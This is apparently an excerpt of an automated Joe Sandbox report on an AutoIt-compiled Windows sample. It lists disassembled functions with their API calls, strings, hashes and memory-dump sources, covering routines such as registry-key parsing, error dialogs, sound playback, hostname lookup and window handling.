API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: b011d544a56ee5dc442ddcb3e81a7cba9a3df8d04d8548b44b3b0fc5b07f4f7a
Instruction ID: 63f46b0598a232edddcfe7599b0e93e89a37dbef8bf8c3ea19ca380026f3c60e
Opcode Fuzzy Hash: b011d544a56ee5dc442ddcb3e81a7cba9a3df8d04d8548b44b3b0fc5b07f4f7a
Instruction Fuzzy Hash: 81410976C14229AACF15EBA4DC95DEEB7B8FF04310F04416AE915B32A1EB309E45CB90

Function 00C50E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4FDAD,?,?), ref: 00C50E31

Strings

HKEY_CLASSES_ROOT, xrefs: 00C50EC4
HKEY_CURRENT_USER, xrefs: 00C50F10
HKCC, xrefs: 00C50EFF
HKEY_LOCAL_MACHINE, xrefs: 00C50E9A
HKCU, xrefs: 00C50F21
HKLM, xrefs: 00C50EAF
HKCR, xrefs: 00C50ED9
HKEY_CURRENT_CONFIG, xrefs: 00C50EEE
HKEY_USERS, xrefs: 00C50F32
HKU, xrefs: 00C50F43

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 72540a5d086c202b6f4837586b0dfdd8d1e7c7ccc0ef486463d2b86e841d4dc1
Instruction ID: 5df76e6c9ff885a0f31ff3f6763f7bbd7afe65bfcb3b268a5638c1a0f16570c3
Opcode Fuzzy Hash: 72540a5d086c202b6f4837586b0dfdd8d1e7c7ccc0ef486463d2b86e841d4dc1
Instruction Fuzzy Hash: B4417B7511064A8BCF20FF50D952AFE33A0FF61305F240495FC615B2A2EB309A9ECB64

Function 00C2F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C0E2A0,00000010,?,Bad directive syntax error,00C5F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C2F7C2
LoadStringW.USER32(00000000,?,00C0E2A0,00000010), ref: 00C2F7C9

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

_wprintf.LIBCMT ref: 00C2F7FC
__swprintf.LIBCMT ref: 00C2F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C2F88D

Strings

., xrefs: 00C2F873
%s (%d) : ==> %s.: %s %s, xrefs: 00C2F7F7
Line %d:, xrefs: 00C2F818
Line %d (File "%s"):, xrefs: 00C2F833
Error: , xrefs: 00C2F85B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: ed8bb51a1860663c79111b7b522f9bbcede59c6cee015b054236d605772d390a
Instruction ID: 3c7ec0979fb369118efe20fd37b4209a531eafabd52475affc1ba60863973d36
Opcode Fuzzy Hash: ed8bb51a1860663c79111b7b522f9bbcede59c6cee015b054236d605772d390a
Instruction Fuzzy Hash: 93218C3284021EABCF11EF90CC1AEEEB7B9BF18300F0404BAB515661A2EE319658DB54

Function 00C352C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

Part of subcall function 00BD7924: _memmove.LIBCMT ref: 00BD79AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C35330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C35346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C35357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C35369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C3537A

Strings

play PlayMe, xrefs: 00C35375
open , xrefs: 00C352DF
status PlayMe mode, xrefs: 00C3532B
close PlayMe, xrefs: 00C35341, 00C3536E
alias PlayMe, xrefs: 00C35309
play PlayMe wait, xrefs: 00C35364

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: f0d317f2ea38723755ae6bf003ef09cb4e2cc47b9568bf91d71271bd3a4b1eb4
Instruction ID: 175e0b8fc150fe567aa23c6bb6cb019d2ca62dd977ba0cd16acb241d3f27baa5
Opcode Fuzzy Hash: f0d317f2ea38723755ae6bf003ef09cb4e2cc47b9568bf91d71271bd3a4b1eb4
Instruction Fuzzy Hash: FD118221AA01297DD760B665CC5ADFFBBBCEB95B44F80046AB411A21E1FEA00D49C6B4

Function 00C346B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C346D2
gethostname.WSOCK32(?,00000100), ref: 00C346EC
gethostbyname.WSOCK32(?), ref: 00C346F9
_wcscpy.LIBCMT ref: 00C34721
_memmove.LIBCMT ref: 00C34734
inet_ntoa.WSOCK32(?), ref: 00C3473F
_strcat.LIBCMT ref: 00C3474D
_wcscpy.LIBCMT ref: 00C34764
WSACleanup.WSOCK32 ref: 00C34772
_wcscpy.LIBCMT ref: 00C34780

Strings

0.0.0.0, xrefs: 00C3471B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 8f671582ae031cd1744a1d49cf3678c5203d14e4775da81f7ca0f3bebeb720ca
Instruction ID: 3fb921bd8be55363df11d623ec18a7695db34fc7d7af78c19602ff14a01b8168
Opcode Fuzzy Hash: 8f671582ae031cd1744a1d49cf3678c5203d14e4775da81f7ca0f3bebeb720ca
Instruction Fuzzy Hash: 9011D8399101186BCB18AB309C46FEE77BCDF07712F0401B9F545A70A1EF719AC5C650

Function 00C34F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C34F7A

Part of subcall function 00BF049F: timeGetTime.WINMM(?,75A8B400,00BE0E7B), ref: 00BF04A3

Sleep.KERNEL32(0000000A), ref: 00C34FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C34FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C34FEC
SetActiveWindow.USER32 ref: 00C3500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C35019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C35038
Sleep.KERNEL32(000000FA), ref: 00C35043
IsWindow.USER32 ref: 00C3504F
EndDialog.USER32(00000000), ref: 00C35060

Strings

BUTTON, xrefs: 00C34FDE

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: d3376dd695ec39391eea7057526c233cb8f6cc0063a70ad8ad9048faeffcef14
Instruction ID: 34edc6293ad2b9bfdf6408890ccd1448e5e52a66eae3efda50ea2552268f1d36
Opcode Fuzzy Hash: d3376dd695ec39391eea7057526c233cb8f6cc0063a70ad8ad9048faeffcef14
Instruction Fuzzy Hash: 7221C378210B05AFE7195F60EC8DB2E3B69EB0A746F0A1039F101921F1DB729E819B61

Function 00C3D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

CoInitialize.OLE32(00000000), ref: 00C3D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C3D67D
SHGetDesktopFolder.SHELL32(?), ref: 00C3D691
CoCreateInstance.OLE32(00C62D7C,00000000,00000001,00C88C1C,?), ref: 00C3D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C3D74C
CoTaskMemFree.OLE32(?,?), ref: 00C3D7A4
_memset.LIBCMT ref: 00C3D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00C3D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C3D840
CoTaskMemFree.OLE32(00000000), ref: 00C3D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C3D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00C3D880

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 410fd7f9fbb6b0d7b14d4cb0ad51de2273fd6fb0705824691dd9a462778eeb20
Instruction ID: a9472263ad40a6a15703d121db36f803ad2f0930b3fe21ec2853554003347fbd
Opcode Fuzzy Hash: 410fd7f9fbb6b0d7b14d4cb0ad51de2273fd6fb0705824691dd9a462778eeb20
Instruction Fuzzy Hash: CAB1EC75A00209AFDB04DF64D889EAEBBF9EF49304F1444A9F916EB251DB30ED45CB50

Function 00C2C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C2C283
GetWindowRect.USER32(00000000,?), ref: 00C2C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C2C2F3
GetDlgItem.USER32(?,00000002), ref: 00C2C2FE
GetWindowRect.USER32(00000000,?), ref: 00C2C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C2C364
GetDlgItem.USER32(?,000003E9), ref: 00C2C372
GetWindowRect.USER32(00000000,?), ref: 00C2C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C2C3C6
GetDlgItem.USER32(?,000003EA), ref: 00C2C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C2C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00C2C3FE

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 9778777be1a8cae2d4f581d309266c4b8e45211f380bd5ac02f9a68897279c55
Instruction ID: f7fc31cb39a28f35c28960ab13b5c26b5753825ad4bc0b2b6d48f0b52cb3f804
Opcode Fuzzy Hash: 9778777be1a8cae2d4f581d309266c4b8e45211f380bd5ac02f9a68897279c55
Instruction Fuzzy Hash: 52515475B00305AFDB18CFA9DD85BAEBBB9EB88311F14852DF515E72A0DB709E418B10

Function 00BD201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BD2036,?,00000000,?,?,?,?,00BD16CB,00000000,?), ref: 00BD1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BD20D3
KillTimer.USER32(-00000001,?,?,?,?,00BD16CB,00000000,?,?,00BD1AE2,?,?), ref: 00BD216E
DestroyAcceleratorTable.USER32(00000000), ref: 00C0BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BD16CB,00000000,?,?,00BD1AE2,?,?), ref: 00C0BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BD16CB,00000000,?,?,00BD1AE2,?,?), ref: 00C0BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BD16CB,00000000,?,?,00BD1AE2,?,?), ref: 00C0BD0A
DeleteObject.GDI32(00000000), ref: 00C0BD1C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e24633b3056baf105356323d3d33002b98cbd18a2511f4c6e60f11b17e163128
Instruction ID: 74d246e65f992a802d3b0ab388db2094db559d6f11a30994df2ce08a391993f0
Opcode Fuzzy Hash: e24633b3056baf105356323d3d33002b98cbd18a2511f4c6e60f11b17e163128
Instruction Fuzzy Hash: 87618C34510B40DFDB2AEF14D988B2AF7F1FF60312F10846EE552AAAA0D770AD81DB54

Function 00BD21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00BD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BD25EC

GetSysColor.USER32(0000000F), ref: 00BD21D3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: fd0c5fe941f6164dfc72bcfa3cddd6b9f7749df572f7dd6fb43647451e6ffe3d
Instruction ID: be923cfe0aea09562ecdee7ac550515834a12eabf78dabd2a2c35c17cf13723f
Opcode Fuzzy Hash: fd0c5fe941f6164dfc72bcfa3cddd6b9f7749df572f7dd6fb43647451e6ffe3d
Instruction Fuzzy Hash: 5341A635004680DBDB259F28DC88BBD7BA5EB16331F1442A6FD759B2E1D7318D82DB21

Function 00C3A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00C5F910), ref: 00C3A90B
GetDriveTypeW.KERNEL32(00000061,00C889A0,00000061), ref: 00C3A9D5
_wcscpy.LIBCMT ref: 00C3A9FF

Strings

unknown, xrefs: 00C3A996
cdrom, xrefs: 00C3A927
removable, xrefs: 00C3A93D
network, xrefs: 00C3A969
all, xrefs: 00C3A911
ramdisk, xrefs: 00C3A97F
fixed, xrefs: 00C3A953

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: a48f354903a78b149d776ac712435b57bbd0e9cb24ae4a97e212c70a308a6863
Instruction ID: eacd35df06524c3913546edba34adad3057d38bcaa5901df73c0eb2c1570aa69
Opcode Fuzzy Hash: a48f354903a78b149d776ac712435b57bbd0e9cb24ae4a97e212c70a308a6863
Instruction Fuzzy Hash: 0351CC31128301ABC700EF14C892AAFB7E5EF84704F44486EF5E5672A2EB31DA19CB53

Function 00BD9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00BD9862
__swprintf.LIBCMT ref: 00BD98AC
__i64tow.LIBCMT ref: 00C0F5E6

Strings

0x%p, xrefs: 00C0F5C8
False, xrefs: 00C0F5AE
True, xrefs: 00C0F5A7
%.15g, xrefs: 00BD98A6

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: f8e66b3e381a12d144e67c053f490a3022e6d77b14c59f7b391ecac8aaeca10e
Instruction ID: 272cc0fcf7ec913aa443b2733064828353d6a483bec0f45d72512b8251117004
Opcode Fuzzy Hash: f8e66b3e381a12d144e67c053f490a3022e6d77b14c59f7b391ecac8aaeca10e
Instruction Fuzzy Hash: 9341C371514209AEDB24EF74DC82A7AB3E8EF05740F2044BEE549D7392FA729A46DB10

Function 00C57152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C5716A
CreateMenu.USER32 ref: 00C57185
SetMenu.USER32(?,00000000), ref: 00C57194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C57221
IsMenu.USER32(?), ref: 00C57237
CreatePopupMenu.USER32 ref: 00C57241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C5726E
DrawMenuBar.USER32 ref: 00C57276

Strings

0, xrefs: 00C57160
F, xrefs: 00C57262

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 36e36fdebba20bcd925fa7ac464fc4ccb43d68ec2ce78c4db8303e94859b0b9d
Instruction ID: ab9f1800348f322d026b7f80a7d0a17126e807b803ce4c72731781c9925337c4
Opcode Fuzzy Hash: 36e36fdebba20bcd925fa7ac464fc4ccb43d68ec2ce78c4db8303e94859b0b9d
Instruction Fuzzy Hash: 15415678A01205EFDB10DF64E848F9A7BB5FB08341F144129FD15A7361D731AA94CB94

Function 00C574BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C5755E
CreateCompatibleDC.GDI32(00000000), ref: 00C57565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C57578
SelectObject.GDI32(00000000,00000000), ref: 00C57580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C5758B
DeleteDC.GDI32(00000000), ref: 00C57594
GetWindowLongW.USER32(?,000000EC), ref: 00C5759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C575B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C575BE

Strings

static, xrefs: 00C574F6

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 852ba8626b9cb57d9beac47313b2bf84e1bb9d809f646f24922a70926f6f6544
Instruction ID: da346134ce14608ebe511007141a7f4c5cc14a1486d70ec74baf1a9dd9ba0de7
Opcode Fuzzy Hash: 852ba8626b9cb57d9beac47313b2bf84e1bb9d809f646f24922a70926f6f6544
Instruction Fuzzy Hash: 77318E3A104214BBDF169F64DC08FDF3B69EF09322F100329FA25A20A0D731D996DB64

Function 00BF6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BF6E3E

Part of subcall function 00BF8B28: __getptd_noexit.LIBCMT ref: 00BF8B28

__gmtime64_s.LIBCMT ref: 00BF6ED7
__gmtime64_s.LIBCMT ref: 00BF6F0D
__gmtime64_s.LIBCMT ref: 00BF6F2A
__allrem.LIBCMT ref: 00BF6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BF6F9C
__allrem.LIBCMT ref: 00BF6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BF6FD1
__allrem.LIBCMT ref: 00BF6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BF7006
__invoke_watson.LIBCMT ref: 00BF7077

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
